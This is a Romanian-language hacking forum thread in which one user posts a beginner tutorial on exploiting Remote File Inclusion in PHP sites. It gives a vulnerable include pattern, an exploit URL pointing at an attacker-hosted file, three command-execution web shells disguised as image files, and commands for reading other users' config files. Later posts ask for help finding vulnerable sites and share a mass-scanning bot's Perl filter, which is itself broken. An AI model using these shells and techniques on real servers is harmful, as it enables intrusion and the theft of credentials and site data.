curiosul Posted February 14, 2010 Report Share Posted February 14, 2010 Tehnica destul de celebra (RFI) , permite includerea mai multor arhive in alte servere ; majoritatea vulnerabilitatilor de genul asta se gasesc in coduri cum ar fi :<?include"$page";?>Asta ar fi exploatat in modul urmator :vuln.php?page=http//[atacant]Normal ar fi sa trimitem la o pagina care sa poata executa comenzile.Arhiva poate contine :<?exec($_GET[cmd],$iesire);foreach($iesire as $line) { echo "$line<br>"; }?>exec();<?system($_GET[cmd],$iesire);foreach($iesire as $line) { echo "$line<br>"; }?>system();<?passthru($_GET[cmd],$salida);foreach($salida as $line) { echo "$line<br>"; }?>passthru();Odata ce aveti arhiva cu codul , puneti o extensie .jpg sau .gif. Uploadati pe serverul victima , si totul este pregatit . Acum imaginativa ca avem adresa : http://atacant.com/xploitulnostru.gif . In xpl.gif trebuie sa fie unul din cele 3 coduri de mai sus . Fiecare cod din cele 3 foloseste o varianta distincta , pt ca unele servere pot bloca unele dintre ele .Acum faceti un url asa : victima.com: The Leading Personal Injury Site on the NetSi asta executa xploitul vostru , si primiti un fel de shell .Ce poti face cu asta ? Mai multe ... poti executa comanda cat de ex , si sa vezi arhive (de configurare de ex) , deasemenea puteti face cat in arhivele altor useri ("cd/home/gheorghe/public_html;") cat si "config.php"sau sa obtineti o lista de arhive ("cd/home/gheorghe/public_html;ls")Tutorialul nu este cine stie ce...este pentru incepatori...Si nu-mi asum responsabilitatea pentru contextul in care folositi tutorialul Quote Link to comment Share on other sites More sharing options...
DarkIceee Posted February 14, 2010 Report Share Posted February 14, 2010 Daca vrei sa faci un tutorial fa-l cap coada , cum iei situri vulnerabile ce programe sa folosesti "link" dupa care toate ce ai spus tu , sper sa te ajute in urmatoarele posturi si inreadevar ms pt partea a 2`a din tutorial . Quote Link to comment Share on other sites More sharing options...
unlocker_bv Posted February 27, 2010 Report Share Posted February 27, 2010 Cine ma poate ajuta cu o treaba la RFI.Am facut un bot in php care scaneaza vulnerabilitati, ca multe altele facute de multi alti de asemenea. Ce as vrea sa intreb este cum sa scot site-urile care contin "my.leetserver.com" la uname:Cmd`ul imi da toate informatiile: uname , free space, uptime, uid si multe altele.$test = $stie.$bug.$cmd - de exemplu si m-am gandit la asta (sa fac un link filter)sub lnk_filter { my @unik = (); foreach my $url ( @_ ) { my $cr = 0; foreach my $b ( @badwords) { if ($test =~ /$b/) { $cr = 1; } } if ($jelek == 0) { push (@unik, $url); } } return @unik;} si la @badwords sa adaug my.leetserver.com. Ce spuneti baieti? O sa mearga?? Quote Link to comment Share on other sites More sharing options...